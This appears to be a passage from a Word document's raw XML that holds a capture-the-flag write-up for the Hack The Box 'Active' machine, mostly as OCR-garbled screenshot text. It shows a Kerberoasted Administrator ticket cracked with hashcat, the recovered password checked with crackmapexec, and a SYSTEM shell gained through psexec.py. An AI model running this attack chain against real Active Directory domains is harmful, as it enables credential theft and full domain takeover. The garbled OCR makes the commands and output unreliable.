&#10;9ee9326da9eødø6e1dc7c9c7ce9189625øf5aø72øe9c723897døe74928afe6ee385e3c5386f77øøae8cø8e4ec11181bøøøfeøac91c7f21accab6cf592e1ba78bbed1ae3986b93d5f1993731e9cae73f3dc7 &#10;6453ab6ea3f22f69ad1e538d35963b754ed3f362ø5ae8b8e5bødaføøc33b8418cc3b22død9c4f82øf4de794øcac272cøadd4da35c914bf6øcd5ef835573cfa67489c9885ee98ø362a7ø38a83fdø7df6bf16 &#10;774038a8d1ø54c854863ø561c85d163d3ff23359eøcc79ca5cff766e1cøbe1574d1b2f4532ae74eb5øøc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the hash into a text file and crack with hashcat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210925" cy="8096250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="Machine generated alternative text:&#10;—'Document s 'Active &#10;L-$ hashcat -m &#10;131øø hash. txt /usr/share/wordlists/rockyou.txt &#10;hashcat (v6.2.6) starting &#10;openCL API (openCL 3.0 PoCL 4.04debian Linux, None&quot;sserts, RELOC, SPIR, LLVM 15.0. 7, SLEEF, DISTRO, POCL DEBUG) &#10;* Device : cpu-sandybridge-1nte1(R) core(TM) 15-6600K CPU 3.50GHz, 1436/2936 MB (512 MB al locatable), 2MClJ &#10;Platform (The pocl project) &#10;Minimum password length supported by kernel: &#10;Maximum password length supported by kernel: 256 &#10;Hashes: 1 digests; 1 unique digests, 1 unique salts &#10;Bitmaps: 16 bits, 65536 entries, øxøøøøffff mask, 262144 bytes, &#10;Rules: 1 &#10;Optimizers applied: &#10;* Zero-Byte &#10;* Not-Iterated &#10;* Single-Hash &#10;* Single-Salt &#10;ATTENTION! Pure (unoptimized) backend kernels selected. &#10;5/13 rotates &#10;Pure kernels can crack longer passwords, but drastically reduce performance. &#10;If you want to switch to optimized kernels, append -O to your command Line. &#10;See the above message to find out about the exact Limits. &#10;Watchdog: Temperature abort trigger set to 9øc &#10;Host memory required for this attack: MB &#10;Dictionary cache hit: &#10;/usr/share/wordlists/rockyou . txt &#10;-k Filename . &#10;* Passwords. &#10;14344385 &#10;-k Bytes. &#10;* Keyspace . &#10;139921507 &#10;14344385 &#10;Cracking performance lower than expected? &#10;* Append -O to the command line. &#10;This Lowers the maximum supported password/salt Length (usually down to 32) &#10;* Append -w 3 to the command line. &#10;This can cause your screen to Lag. &#10;* Append -S to the command line. &#10;This has a drastic speed impact but can be better for specific attacks. &#10;Typical scenarios are a small wordlist but a Large ruleset. &#10;* Update your backend API runtime / driver the right way: &#10;https://hashcat . net/faq/wrongdriver &#10;* Create more work items to make use of your parallelization power: &#10;https : //hashcat . net/faq/morewor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—'Document s 'Active &#10;L-$ hashcat -m &#10;131øø hash. txt /usr/share/wordlists/rockyou.txt &#10;hashcat (v6.2.6) starting &#10;openCL API (openCL 3.0 PoCL 4.04debian Linux, None&quot;sserts, RELOC, SPIR, LLVM 15.0. 7, SLEEF, DISTRO, POCL DEBUG) &#10;* Device : cpu-sandybridge-1nte1(R) core(TM) 15-6600K CPU 3.50GHz, 1436/2936 MB (512 MB al locatable), 2MClJ &#10;Platform (The pocl project) &#10;Minimum password length supported by kernel: &#10;Maximum password length supported by kernel: 256 &#10;Hashes: 1 digests; 1 unique digests, 1 unique salts &#10;Bitmaps: 16 bits, 65536 entries, øxøøøøffff mask, 262144 bytes, &#10;Rules: 1 &#10;Optimizers applied: &#10;* Zero-Byte &#10;* Not-Iterated &#10;* Single-Hash &#10;* Single-Salt &#10;ATTENTION! Pure (unoptimized) backend kernels selected. &#10;5/13 rotates &#10;Pure kernels can crack longer passwords, but drastically reduce performance. &#10;If you want to switch to optimized kernels, append -O to your command Line. &#10;See the above message to find out about the exact Limits. &#10;Watchdog: Temperature abort trigger set to 9øc &#10;Host memory required for this attack: MB &#10;Dictionary cache hit: &#10;/usr/share/wordlists/rockyou . txt &#10;-k Filename . &#10;* Passwords. &#10;14344385 &#10;-k Bytes. &#10;* Keyspace . &#10;139921507 &#10;14344385 &#10;Cracking performance lower than expected? &#10;* Append -O to the command line. &#10;This Lowers the maximum supported password/salt Length (usually down to 32) &#10;* Append -w 3 to the command line. &#10;This can cause your screen to Lag. &#10;* Append -S to the command line. &#10;This has a drastic speed impact but can be better for specific attacks. &#10;Typical scenarios are a small wordlist but a Large ruleset. &#10;* Update your backend API runtime / driver the right way: &#10;https://hashcat . net/faq/wrongdriver &#10;* Create more work items to make use of your parallelization power: &#10;https : //hashcat . net/faq/morework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09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506325" cy="5229225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14" name="Picture 14" descr="Machine generated alternative text:&#10;$krb5tgs$23$*Administrator$ACTIVE . HTB$active . htb/Administrator*$d59a317c5bøeb15a91dfcd7ø9b33fe71$37e6ø3ab659fd5648132c76Ø3fc77b9232d4øf4fca99f2aa1e9d8d35dd7Ø49aecø &#10;f65f455daøø7fb692føbb5dd6cb5218116edc11342349f7363352b52d3f492cc45baa65a9c35bd522f5632b44e2ø494afec8ceø66b1d52787177a696fb8øa7a4ae6cøff377b439a5972314f74519a4c6f45 &#10;919076ca8be3bd4127b1b789e94127ø5546ø1d72f34755fabf462dd7f5d97f9a1ø6c8773c169b577øø2adcaø92d3726d3ø9899øb164dø78ødfad795a4dc73d7c492cfa2318f1166e96e3f48c8bbb4daefc8 &#10;09fd72bf266663c4d1døaf841b44b531be8fa22cabacøde8f786943b5fcbf3257c51bb752d495a6fe5ca74a9c788f5bb36øc559a5eø565fc9716Ø84d2378Ø5ba137bd2926b875øeff971499e1f9df6ød1bd &#10;7dØ1f8øf9a286ad88abad82b86ff19e45e55a2c5bd3e2a58f6b9a92f5Ø22Ø97b89ddc366Ø6e5a9fc14dccfe125cc1f6726ed53c311dcø5a7Øaa5aaf55f8522989ebac4cce67373979ffac54343f3684c2aø &#10;5afc3ø7117ø483fae32d81395ø9efff7d4b3163e4b58eøbbfad848ø4caøcadc6f82815333aø64b2d5Ø6aa56248683d61859d3e25cc8d9c38baØ9221193dfd47297766ba8f93fd16c39d2c43e392øø9ø712c &#10;If66388bc25Ø6abfecb3f4446cbc44Ø9c455Ø46bbf86b2242859cba692øa4b7cf4e2c422fe2ca3c29898b3b7c5fd6d9Ø12e12b52993aøø66c5fbcb8457ad13aba7øcac47f6Ø5aø7Øbf94aøø7e86baøø4fd2 &#10;d9c8ø61c97fce84a25de454963f9c9239675e13c53eda8caaace676baØ2cfbb1e9efd4bd51b683417a139888afa8283øc763ec84521cf1a74c2aø8d919932a431d1e7e15e989e42c9f67e218cbd2b242256 &#10;ceaad5b36d97b1a3øeceefb3e11277e3e6f8742d7efØ62fØ7e854Ø8Ø64e7cdcdfdbec5f5da9adøe5d4ba1cdbaød11fbøab2aebafced11Øb3øa33fde8575b3ab5f9df44øcbd6665aacaaf2292a28c8ac73b5 &#10;9ee9326da9eødØ6e1dc7c9c7ce9189625øf5aø72øe9c723897døe74928afe6ee385e3c5386f77øøae8cø8e4ec11181bøøøfeøac91c7f21accab6cf592e1ba78bbed1ae3986b93d5f1993731e9cae73f3dc7 &#10;6453ab6ea3f22f69ad1e538d35963b754ed3f362ø5ae8b8e5bødaføøc33b8418cc3b22død9c4f82øf4de794øcac272cøadd4da35c914bf6øcd5ef835573cfa67489c9885ee98ø362a7ø38a83fdø7df6bf16 &#10;774038a8d1ø54c854863ø561c85d163d3ff23359eøcc79ca5cff766e1cøbe1574d1b2f4532ae74eb5øøc : Ticketmaster1968 &#10;Hardware . Mon . &#10;Session... &#10;Status. &#10;Hash . Mode.. &#10;Hash. Target.... .. &#10;Time . Started. &#10;Time . Estimated . . &#10;Kernel. Feature &#10;Guess . Base.. &#10;Guess.Queue...... &#10;Speed .t$l.. &#10;Recovered... ..... &#10;Progress.... ..... : &#10;Rejected. &#10;Restore. Point.... &#10;Restore. Sub . &#10;Candidate. Engine. &#10;Candidates .t$l.. &#10;hashcat &#10;Cracked &#10;13100 (Kerberos 5, etype 23, TGS-REP) &#10;$krb5tgs$23$*Administrator$ACTIVE . HTB$active . htb/Ad . &#10;sat sep 9 2023 (14 secs) &#10;sat sep 9 2023 (ø secs) &#10;Pure Kernel &#10;File (/usr/share/wordlists/rockyou. txt) &#10;1/1 (løø.øø%) &#10;eb5øøc &#10;874.2 kH/s (ø.47ms) Accel:256 Loops:l Thr:l vec•.8 &#10;1/1 (løø.øø%) Digests (total), &#10;1/1 (løø.øø%) Digests (new) &#10;10537472/14344385 (73.46%) &#10;0/10537472 (ø.øø%) &#10;10536960/14344385 (73.46%) &#10;Salt:ø Amplifier:ø-l Iteration:ø-l &#10;Device Generator &#10;Tiffany95 &#10;Util: 82% &#10;9 20: 44 : 46 &#10;Tiana87 &#10;2023 &#10;2023 &#10;Started: &#10;Stopped. &#10;Sat Sep &#10;Sat Se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$krb5tgs$23$*Administrator$ACTIVE . HTB$active . htb/Administrator*$d59a317c5bøeb15a91dfcd7ø9b33fe71$37e6ø3ab659fd5648132c76Ø3fc77b9232d4øf4fca99f2aa1e9d8d35dd7Ø49aecø &#10;f65f455daøø7fb692føbb5dd6cb5218116edc11342349f7363352b52d3f492cc45baa65a9c35bd522f5632b44e2ø494afec8ceø66b1d52787177a696fb8øa7a4ae6cøff377b439a5972314f74519a4c6f45 &#10;919076ca8be3bd4127b1b789e94127ø5546ø1d72f34755fabf462dd7f5d97f9a1ø6c8773c169b577øø2adcaø92d3726d3ø9899øb164dø78ødfad795a4dc73d7c492cfa2318f1166e96e3f48c8bbb4daefc8 &#10;09fd72bf266663c4d1døaf841b44b531be8fa22cabacøde8f786943b5fcbf3257c51bb752d495a6fe5ca74a9c788f5bb36øc559a5eø565fc9716Ø84d2378Ø5ba137bd2926b875øeff971499e1f9df6ød1bd &#10;7dØ1f8øf9a286ad88abad82b86ff19e45e55a2c5bd3e2a58f6b9a92f5Ø22Ø97b89ddc366Ø6e5a9fc14dccfe125cc1f6726ed53c311dcø5a7Øaa5aaf55f8522989ebac4cce67373979ffac54343f3684c2aø &#10;5afc3ø7117ø483fae32d81395ø9efff7d4b3163e4b58eøbbfad848ø4caøcadc6f82815333aø64b2d5Ø6aa56248683d61859d3e25cc8d9c38baØ9221193dfd47297766ba8f93fd16c39d2c43e392øø9ø712c &#10;If66388bc25Ø6abfecb3f4446cbc44Ø9c455Ø46bbf86b2242859cba692øa4b7cf4e2c422fe2ca3c29898b3b7c5fd6d9Ø12e12b52993aøø66c5fbcb8457ad13aba7øcac47f6Ø5aø7Øbf94aøø7e86baøø4fd2 &#10;d9c8ø61c97fce84a25de454963f9c9239675e13c53eda8caaace676baØ2cfbb1e9efd4bd51b683417a139888afa8283øc763ec84521cf1a74c2aø8d919932a431d1e7e15e989e42c9f67e218cbd2b242256 &#10;ceaad5b36d97b1a3øeceefb3e11277e3e6f8742d7efØ62fØ7e854Ø8Ø64e7cdcdfdbec5f5da9adøe5d4ba1cdbaød11fbøab2aebafced11Øb3øa33fde8575b3ab5f9df44øcbd6665aacaaf2292a28c8ac73b5 &#10;9ee9326da9eødØ6e1dc7c9c7ce9189625øf5aø72øe9c723897døe74928afe6ee385e3c5386f77øøae8cø8e4ec11181bøøøfeøac91c7f21accab6cf592e1ba78bbed1ae3986b93d5f1993731e9cae73f3dc7 &#10;6453ab6ea3f22f69ad1e538d35963b754ed3f362ø5ae8b8e5bødaføøc33b8418cc3b22død9c4f82øf4de794øcac272cøadd4da35c914bf6øcd5ef835573cfa67489c9885ee98ø362a7ø38a83fdø7df6bf16 &#10;774038a8d1ø54c854863ø561c85d163d3ff23359eøcc79ca5cff766e1cøbe1574d1b2f4532ae74eb5øøc : Ticketmaster1968 &#10;Hardware . Mon . &#10;Session... &#10;Status. &#10;Hash . Mode.. &#10;Hash. Target.... .. &#10;Time . Started. &#10;Time . Estimated . . &#10;Kernel. Feature &#10;Guess . Base.. &#10;Guess.Queue...... &#10;Speed .t$l.. &#10;Recovered... ..... &#10;Progress.... ..... : &#10;Rejected. &#10;Restore. Point.... &#10;Restore. Sub . &#10;Candidate. Engine. &#10;Candidates .t$l.. &#10;hashcat &#10;Cracked &#10;13100 (Kerberos 5, etype 23, TGS-REP) &#10;$krb5tgs$23$*Administrator$ACTIVE . HTB$active . htb/Ad . &#10;sat sep 9 2023 (14 secs) &#10;sat sep 9 2023 (ø secs) &#10;Pure Kernel &#10;File (/usr/share/wordlists/rockyou. txt) &#10;1/1 (løø.øø%) &#10;eb5øøc &#10;874.2 kH/s (ø.47ms) Accel:256 Loops:l Thr:l vec•.8 &#10;1/1 (løø.øø%) Digests (total), &#10;1/1 (løø.øø%) Digests (new) &#10;10537472/14344385 (73.46%) &#10;0/10537472 (ø.øø%) &#10;10536960/14344385 (73.46%) &#10;Salt:ø Amplifier:ø-l Iteration:ø-l &#10;Device Generator &#10;Tiffany95 &#10;Util: 82% &#10;9 20: 44 : 46 &#10;Tiana87 &#10;2023 &#10;2023 &#10;Started: &#10;Stopped. &#10;Sat Sep &#10;Sat Sep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3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this we get a password of Ticketmaster1968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now check the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>username and password combination to see if they can get a session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848975" cy="657225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="Machine generated alternative text:&#10;(kali@ kali)-C &#10;—'Document s 'Active &#10;$ crackmapexec smb lø.lø.lø.løø &#10;Administrator &#10;active. htb &#10;Ticketmaster1968 &#10;Windows 6.1 Build 7601 x64 (name: DC) (domain: active.htb) (signing: True) (SMBv1 : False) &#10;(+1 active.htbXAdministrator:Ticketmaster1968 (pwn3d!) &#10;10.10. 10.100 &#10;10.10. 10.100 &#10;445 &#10;44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(kali@ kali)-C &#10;—'Document s 'Active &#10;$ crackmapexec smb lø.lø.lø.løø &#10;Administrator &#10;active. htb &#10;Ticketmaster1968 &#10;Windows 6.1 Build 7601 x64 (name: DC) (domain: active.htb) (signing: True) (SMBv1 : False) &#10;(+1 active.htbXAdministrator:Ticketmaster1968 (pwn3d!) &#10;10.10. 10.100 &#10;10.10. 10.100 &#10;445 &#10;445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89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can!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38775" cy="2505075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="Machine generated alternative text:&#10;(kali@ kali)-C &#10;—'Document s 'Active &#10;$ psexec.py active.htb/Administrator: 'Ticketmaster1968•a1ø.1ø.1ø.1øø &#10;Impacket vø.9.19 &#10;Copyright 2019 SecureAuth Corporation &#10;) Requesting shares on lø.lø.lø.løø..... &#10;Found writable share ADMIN$ &#10;Uploading file hknVTbVV.exe &#10;Opening SVCManager on lø.lø.lø.løø. &#10;Creating service PTup on lø.lø.lø.løø..... &#10;) Starting service PTup &#10;C!) Press help for extra shell commands &#10;Microsoft Windows (Version 6.1.7601) &#10;Copyright (c) 2009 Microsoft Corporation. &#10;All rights reserved. &#10;C: NWindowsXsystem32Äuhoami &#10;nt authorityxsyst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(kali@ kali)-C &#10;—'Document s 'Active &#10;$ psexec.py active.htb/Administrator: 'Ticketmaster1968•a1ø.1ø.1ø.1øø &#10;Impacket vø.9.19 &#10;Copyright 2019 SecureAuth Corporation &#10;) Requesting shares on lø.lø.lø.løø..... &#10;Found writable share ADMIN$ &#10;Uploading file hknVTbVV.exe &#10;Opening SVCManager on lø.lø.lø.løø. &#10;Creating service PTup on lø.lø.lø.løø..... &#10;) Starting service PTup &#10;C!) Press help for extra shell commands &#10;Microsoft Windows (Version 6.1.7601) &#10;Copyright (c) 2009 Microsoft Corporation. &#10;All rights reserved. &#10;C: NWindowsXsystem32Äuhoami &#10;nt authorityxsystem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000000" w:rsidRDefault="00EF54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Very interesting box</w:t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EF54C2"/>
    <w:rsid w:val="00EF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B59782-4B6D-47DA-A8A8-6A80A469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ghumanr</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ghumanr</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-28T22:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-28T22:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>